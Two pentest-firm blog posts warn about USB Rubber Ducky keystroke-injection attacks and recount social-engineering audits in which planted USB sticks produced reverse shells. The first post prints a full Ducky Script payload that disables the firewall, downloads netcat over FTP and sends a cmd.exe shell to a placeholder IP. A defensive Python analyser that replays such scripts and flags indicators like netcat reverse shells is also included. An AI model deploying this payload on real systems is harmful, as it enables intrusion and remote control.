December 23, 2015

Some customers think that the USB threat may have gone away since Windows 7, where AutoPlay/AutoRun is disabled by default. While this is true for most standard USB attack vectors, it doesn't apply to USB Rubber Ducky attacks.

What’s the difference?

The USB Rubber Ducky attack works differently in that it doesn't execute an .exe or similar file; instead it emulates an external keyboard, which is not flagged as malicious activity or as a virus by AV or endpoint protection. It's like plugging in an external keyboard, but rather than a user typing in the commands, the Rubber Ducky types a scripted set of commands instead.

The following raw Ducky Script (prior to compiling for the device) opens a command prompt, disables the Windows firewall with netsh, connects to an FTP server with a scripted ftp session, downloads Netcat and then proceeds to send a shell to a specified IP and port receiver.

DELAY 10000
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 600
STRING cd %USERPROFILE%
ENTER
DELAY 100
STRING netsh firewall set opmode disable
ENTER
DELAY 2000
STRING echo open ftp.something.com 21 > ftp.txt
ENTER
DELAY 100
STRING echo user@something.com>> ftp.txt
ENTER
DELAY 100
STRING echo password>> ftp.txt
ENTER
DELAY 100
STRING echo bin >> ftp.txt
ENTER
DELAY 100
STRING echo get nc.exe >> ftp.txt
ENTER
DELAY 100
STRING echo bye >> ftp.txt
ENTER
DELAY 100
STRING ftp -s:ftp.txt
ENTER
STRING del ftp.txt & exit
ENTER
DELAY 2000
GUI r
DELAY 200
STRING nc -nv X.X.X.X 3333 -e cmd.exe
ENTER
DELAY 2000
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 600
STRING exit
ENTER
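
Rather than plugging a found device in, a responder can replay the script offline to see exactly what it would type. The following Python analyser is an added example, not code from the post or from the Rubber Ducky project: it interprets the STRING, ENTER and DELAY keywords used above, reconstructs the typed command lines, sums the delays, and flags lines matching a small assumed indicator list; the sample script is a constructed cut-down of the payload shown above.

```python
import re

# Constructed sample: the post's payload, cut down to its key steps.
SAMPLE = """DELAY 10000
GUI r
DELAY 200
STRING cmd
ENTER
STRING netsh firewall set opmode disable
ENTER
STRING echo get nc.exe >> ftp.txt
ENTER
STRING ftp -s:ftp.txt
ENTER
STRING nc -nv X.X.X.X 3333 -e cmd.exe
ENTER
"""

# Indicators a responder would look for (assumed list, extend as needed).
INDICATORS = [
    ("firewall tampering", re.compile(r"\bnetsh\b.*\bfirewall\b", re.I)),
    ("scripted ftp download", re.compile(r"\bftp\b.*-s:", re.I)),
    ("netcat reverse shell", re.compile(r"\bnc(\.exe)?\b.*\s-e\b", re.I)),
]

def replay(script):
    """Return the command lines the script would type, in order.
    STRING appends to the current line, ENTER submits it; DELAY, REM
    (comments) and key chords such as GUI r type no text."""
    typed, buf = [], ""
    for raw in script.splitlines():
        cmd, _, arg = raw.strip().partition(" ")
        if cmd.upper() == "STRING":
            buf += arg
        elif cmd.upper() == "ENTER":
            typed.append(buf)
            buf = ""
    return typed

def total_delay_ms(script):
    """Sum of DELAY values: how long the device waits before acting."""
    return sum(int(l.split()[1]) for l in script.splitlines()
               if l.strip().upper().startswith("DELAY "))

def flag(typed):
    """Pair each typed line with the indicator labels it matches."""
    return [(label, line) for line in typed
            for label, rx in INDICATORS if rx.search(line)]
```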

We were recently engaged by a Fortune 500 company for a pentest with sound defenses in place, yet their laptops were compromised that way and a lot of juicy information could be harvested. FireEye, McAfee ePO and all the endpoint defenses they had in place couldn't stop users plugging in a Rubber Ducky. Especially not when the Rubber Ducky is labeled "CEO salaries 2015", "free Amazon vouchers" or "free Expedia vouchers". 8/10 USBs were plugged in and 8/10 shells were received.

The company has security in place and employees are taught not to plug in unknown devices, but hey... curiosity and the opportunity to get something for free beat any security policy...

For folks interested in the USB rubber ducky, here is the link:
http://hakshop.myshopify.com/collections/usb-rubber-ducky/products/usb-rubber-ducky-deluxe?variant=353378649


March 21, 2015

We have been using those in our assessments for quite a while, but we are still impressed by how easy it is to compromise complete networks by just someone plugging in this USB stick as part of a social engineering assessment.

Back in the day, an executable file was placed on a USB stick and, once it was plugged into a machine, AutoRun executed it. Microsoft has since disabled AutoRun on newer OS versions, so you rely on users to click or open a payload, it must be crafted for the exact OS, and so on. A pain.

Not with Rubber Ducky. Rubber Ducky recently helped us to compromise a lot of MacBooks at an audit, along with Microsoft Windows 8 machines and admin Linux desktops. Why is it so easy? Well, because Rubber Ducky emulates a keyboard rather than executing a program. That means that, to the machine the Ducky is inserted in, it's like a user typing things: enabling the camera from the CLI, opening a reverse shell. This is what makes it so hard for OSes to defend themselves against it.

We recently did a social engineering audit at a large insurance company. One of our ladies simply went to the non-restricted coffee break-out area at the reception and put out 10 USB sticks with different tags on them, such as: GRAB ME – I AM FREE, MANAGEMENT CONFIDENTIAL or LATEST 2015 EMPLOYEE PAYROLL. Guess what? All 10 USBs were taken within 15 minutes, and only 2 hours later 8 of the 10 employees who took this "free gift" had inserted it into their machines and opened them up to us via reverse shell.

This once again shows that no defense is of any use if employees plug in USB sticks they find in the coffee area. Now, this was a large insurance company. Imagine private users in a Starbucks. Scary.

Those things cost around $45 USD each. Imagine a real hacking group purchasing 100 of them for malicious purposes.

We can only warn again and again: don't plug any USB sticks into your devices. Especially not ones whose origin you don't know!

http://usbrubberducky.com
